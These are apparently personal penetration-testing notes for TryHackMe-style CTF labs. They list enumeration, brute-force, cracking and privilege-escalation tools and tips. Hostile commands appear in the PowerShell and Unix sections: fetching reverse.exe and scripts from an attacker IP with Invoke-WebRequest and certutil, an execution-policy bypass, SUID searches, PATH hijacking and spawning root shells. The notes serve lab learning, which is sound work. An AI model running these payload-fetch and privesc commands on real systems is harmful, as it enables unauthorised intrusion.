Things to think about when stuck:
    
    Don't know what to do next:
        "Is there anything I can just bruteforce?"
        "Does this service have default credentials?"
        "What else is open for me to input?"

    Exploit Found but still stuck:
        "If I found an exploit, or maybe even if I haven't, is there a place the service stores a database? Can I access that place?"
        "If I need a specific file type (.asp, .html, etc) have a tried to make a payload with that file extension with msfvenom?"
        "Can I base64 encode a powershell script with the -enc command and call it on the target computer?"
        "Have I tried encoding the payload?"

    No exploit, only information:
        "Is the version exploitable? Are there known exploits to this technology?"

    Access, but no root:
        "Is there a process that writes/executes as root? Can I somehow make it write/execute a reverse root shell?"

---------------------------------------------------------------------------------
---------------------------------------------------------------------------------

Photo Forensics:
    exiftools - to look at photo exif data (meta data)
    binwalk - to extract any embedded files or executables from a photo
    steghide - to hide or decode messages inside images or audio files 

---------------------------------------------------------------------------------
---------------------------------------------------------------------------------

Binary File:
    xxd - to turn a file's binary into hexadecimal completely and dump out the result.

---------------------------------------------------------------------------------
---------------------------------------------------------------------------------

Enumeration:
    
    Swiss Army:
        Metasploit(msfconsole) - Database with interactive shell to run known exploits on targets. 
            * ALWAYS SET LHOST TO BE THM VPN IP!!!!!!!
            * ALWAYS SET THE LHOST, PAYLOAD, AND LPORT WHEN USING METERPRETER SHELL FOR WINDOWS MACHINES
            * On windows, "C:\Windows\Temp" is typically a folder that is world writable.
            * You can use the suggester for suggestions on priviledge escalation by backgrounding the session then calling "search suggestor" and using it.
                ^Make sure you record the session that is backgrounded.

    ---------------------------------------

    Brute Forcing:
        gobuster - For bruteforcing directories and files on a webserver
        dirbuster - For bruteforcing directories and files on a webserver
        hydra - For bruteforcing usernames and passwords on ssh, http, https, etc.

        If you have a password that isn't working, but the password has a date/season/year in it, maybe try the current year?

    ---------------------------------------

    Networking:
        nc (NetCat) - Port listener that will give you control of a port through a terminal among other things 
        nmap - Enumeration essential for scanning ports
        ssh - Secure Shell Protocol with RSA encryption which can be overcome with someone's rsa private key.
                * Sometimes even failing to login-in to SSH can reveal a banner that has some information about how to log in or
                just some sort of additional information.
    
    ---------------------------------------

    Hashing and Cracking:
        john the ripper - useful for many methods of encryption such as RSA Public key encryption.
    
    ---------------------------------------

    Searching:

        Files and Directories:
            dirsearch - Search for a specific directory in a server.
            dirbuster - Bruteforcing application for website directories.

            Samba Servers:
                smbclient - Linux way to interact with SMB.
                    - "-L" To list all shares as an anonymous user.
                    - "-N" To auto-anonymous yourself.
                smbget - Gets files on samba shares as long as a share(nmap script to find), username and password are known.

        Users and Passwords:
            enum4linux - for enumerating from a linux machine onto a Windows or Samba(Windows repurposed) machine
            (AA) linPEAS - Linux priviledge escalation to find possible ways
            to escalate to a non-anonymous user or sudo/root.

    ---------------------------------------

    Proxies and Web:
        Burp Suite - Allows the control and analysis of incoming and outcoming communications/packets.

---------------------------------------------------------------------------------
---------------------------------------------------------------------------------

Exploitation

    Payloads:

        Reverse Shells:
            - Sometimes switching from a staged to a non-staged or vice versa can fix a problem of the shell "dying".

    Brute Force:
    
        - Password Spraying / Credential stuffing with BurpSuite.

    Default Credentials:

---------------------------------------------------------------------------------
---------------------------------------------------------------------------------


Priviledge Escalation:

    Things to think about:
        - OS version vulnerability / sysinfo.
        - SUID files
        - Writeable /etc/passwd to make a new superuser
        - Root execution of vi
        - Cronjobs with root user
    
    ---------------------------------------

    *nix:
        /bin/sh - opens a shell (can be useful for SUID programs accessible by a user that is also accessible.

        " find / -perm -u=s -type f 2>/dev/null " - to find all files in the system that have root setting on execution.

        " export PATH=/tmp:$PATH " - For setting a temporary executable in tmp for path variable abuse.

---------------------------------------------------------------------------------
---------------------------------------------------------------------------------

Unix Helpers:

    "sed -i -e 's/\r$//' scriptname.sh" - Windows will have these stupid fucking line endings in their text files, so you can do a "Stream Editor" call to fix the file -i inplace with an -e expression.

    tee - for piping input and output easily

    ifconfig - for seeing network information and ipaddress

    whoami - See the currnet user's username

    curl (client URL) - Allow arbitrary sending of http requests

    cat - Show the contents of a file

    THIS -> | - Using the pipe to force the next command to be executed can be useful when a windows server will only execute powershell scripts after a pipe.

    less - Show the contents of a file

    echo "$SHELL" - Show which shell the user is currently using

    "sudo -l" - For listing what can be run as sudo even when as a non-sudoer

    "sudo -u" - For running scripts as another user, preferably with root priviledges.
        * On the chance that you do have that ability, running "sudo -u rootuser /bin/bash" will give you a root shell.

    ps -p $$ - Show which shell the user is currently using reliably

    /etc/passwd - Catting/lessing this file will show all the 
    users in the server at the bottom of the list.
    
    /etc/shells - Catting/lessing this file will show all the
    shells available.

    ls -la /etc/passwd - List priviledges from passwd.

    find / -perm -u=s -type f 2>/dev/null - Find SUID files in a linux filesystem for privesc. Read man for details : "You must specify `u', `g' or `o' if you use a symbolic mode."

    lsb_release -a (linux standard base) - Shows short title information about linux distro
    and linux version.

    netstat -ano - This will list all the active ports on a machine.

    arp -a - To look at the ARP table of a machine.

---------------------------------------------------------------------------------
---------------------------------------------------------------------------------

Tmux commands:
    
    Copy - Press the tmux toggler then space to select the words you want to copy. Then press ENTER to copy it into clip board and paste with vim with set paste.

---------------------------------------------------------------------------------
---------------------------------------------------------------------------------

Nmap commands:
    // To see any mounts on a smb server accesible through rpcbind
    nmap -p <rpcbind port> --script=nfs-ls,nfs-statfs,nfs-showmount <ip of where smb is located>

---------------------------------------------------------------------------------
---------------------------------------------------------------------------------

Windows Powershell (WTF)

    PrivEsc:

        * If you are denied access to a folder, but have the path to a folder that comes through that restricted folder, trying to access the direct path might fucking work for some reason!*

        powershell Invoke-WebRequest -Uri http://10.8.30.155:1337/reverse.exe -Outfile reverse.exe - To do a Windows equivalent of a wget with powershell.
            - Make sure you are in a world-writable directory such as C://Windows/Temp/
        
        certutil - Although it is used for fetching certificates, it can be used for fetching any arbitrary file, including executables. 
            - ie. "certutil -urlcache -f http://10.10.x.x/somefile.exe shell.exe

        sherlock.ps1 - AutoEnumeration of known exploits
            - ie. certutil -urlcache -f http://10.10.10.x/sherlock.ps1 sherlock.ps1
            Then on the target machine: "powershell.exe -exec bypass -Command "& {Import-Module .\sher.ps1; Find-AllVulns}" "
    
    Meterpreter Commands:
        - getuid => same as whoami in windows.
        - ps => to get to running processes and identify certain users including yourself.
        - migrate -> to migrate to a more stable user in higher position.
            * Certain metasploit exploits WILL NOT WORK WITHOUT A STABLE PROCESS/USER.

    Meterprete PrivEsc:
        - Remeber that sometimes getting another reverse shell with metasploit once you have a session can give you a shell with higher priviledges as NT AUTHORITY/SYSTEM instead of whatever you had earlier.
        - Try looking for a service that has an authority to migrate to. Then background the process and then try to use 
        the windows exploit suggestor by searching "suggester" in metasploit. 

